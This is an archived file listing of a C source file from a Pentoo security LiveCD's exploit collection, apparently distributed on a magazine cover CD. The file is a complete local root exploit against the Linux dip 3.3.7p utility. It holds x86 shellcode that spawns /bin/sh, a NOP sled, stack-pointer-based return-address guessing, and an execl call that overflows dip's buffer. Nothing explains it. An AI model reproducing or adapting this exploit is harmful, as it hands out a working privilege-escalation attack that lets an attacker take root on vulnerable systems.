home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / linux / local / dip-exp2.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  870b  |  49 lines
  1. /* Linux x86 dip 3.3.7p exploit by pr10n */
  2.  
  3.  
  4. #include <stdio.h>
  5.  
  6. #define NOP 0x90
  7.  
  8.  
  9. /*thanks to hack.co.za*/
  10. char shellcode[] =
  11.           "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\xeb\x1d"
  12.           "\x5e\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x89\xf3"
  13.           "\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
  14.           "\x31\xdb\x40\xcd\x80\xe8\xde\xff\xff\xff/bin/sh";
  15.  
  16.  
  17.  
  18. unsigned long get_sp(void){ __asm__("movl %esp, %eax");}
  19.  
  20. main(int argc, char *argv[]){
  21.  
  22. char buf[136];
  23. int i;
  24. int offset=0,*ptr;
  25. long ret;
  26.  
  27.  
  28. if(argc!=2){
  29. printf("usage: %s offset\n",argv[0]);
  30. exit(0);}
  31.  
  32. offset=atoi(argv[1]);
  33.  
  34. ret=(get_sp()-offset);
  35.  
  36. for(i=1;i<136;i+=4){
  37. *(long *)&buf[i]=ret;}
  38.  
  39. printf("\nusing: 0x%x\n\n",ret);
  40.  
  41. for(i=0;i<(sizeof(buf)-strlen(shellcode)-40);i++)
  42. buf[i]=NOP;
  43.  
  44. memcpy(buf+i,shellcode,strlen(shellcode));
  45.  
  46. execl("/usr/sbin/dip","dip","-k","-l",buf,(char *)0);
  47.  
  48. }
  49.